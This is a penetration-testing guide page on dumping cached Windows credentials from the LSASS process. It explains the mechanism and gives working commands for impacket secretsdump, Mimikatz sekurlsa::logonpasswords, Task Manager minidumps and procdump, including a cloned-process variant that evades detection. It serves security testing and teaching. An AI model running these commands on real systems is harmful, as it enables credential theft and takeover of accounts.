LSASS Credentials

The Local Security Authority Subsystem Service (LSASS) process manages various security-related functions in Windows, such as user authentication.

LSASS (lsass.exe) is a process that implements many functions of the Local Security Authority (LSA).

When a domain user performs an interactive logon (physically or via RDP) to a computer, the user's credentials get cached in the LSASS Process in order to use Single Sign-On (SSO) when a network logon is required to access services on the domain.

Users authenticating remotely via NTLM or Kerberos authentication will not cache their credentials on the computer unless Kerberos delegation is enabled.

To access the LSASS Process memory to extract credentials, you must have a user account with SeDebugPrivilege on the target Windows computer. Most of the time, this means that you have access to an account with local administrator privileges on the computer.

SeDebugPrivilege gives the ability to inspect and manipulate any process on the system, regardless of ownership or permissions.

There are many, many tools and research on ways an attacker can dump the LSASS process. Dumping LSASS is a much larger topic than what is mentioned here, especially once you look into protections against LSASS dumping and evading EDR.

Regardless, below are a few popular methods that may work on organizations that may not have executed any penetration tests.

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

secretsdump.py <domain/>[username]<:password><@computer> <options>

OPTIONS
-outputfile                 Base Output Filename
-hashes                     Authenticate Using LMHASH:NTHASH
-k                          Use Kerberos Auth From ccache File

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

Windows (Target Computer)

## Run Mimikatz
mimikatz.exe

## Enable SeDebugPrivilege In Your Terminal
privilege::debug

## Dump LSASS Memory
sekurlsa::logonpasswords

You can create a minidump of the lsass.exe process using the Task Manager running as administrator. Simply locate lsass.exe, right-click on it, and select Create Dump File. We can then use Mimikatz to read the dump.

Linux/Windows

## Switch Mimikatz context to the lsass.exe dump
sekurlsa::minidump [path to lsass dump]

## Dump Contents Of LSASS Dump
sekurlsa::logonpasswords

ProcDump - SysinternalsMicrosoftLearn

Windows (Target Computer)

## Dump LSASS Process
procdump.exe -accepteula -ma lsass.exe lsass.dmp

## Avoid Reading LSASS By Dumping Cloned LSASS Process
procdump.exe -accepteula -r -ma lsass.exe lsass.dm

PreviousFile Shares NextRegistry Credentials

Last updated 12 days ago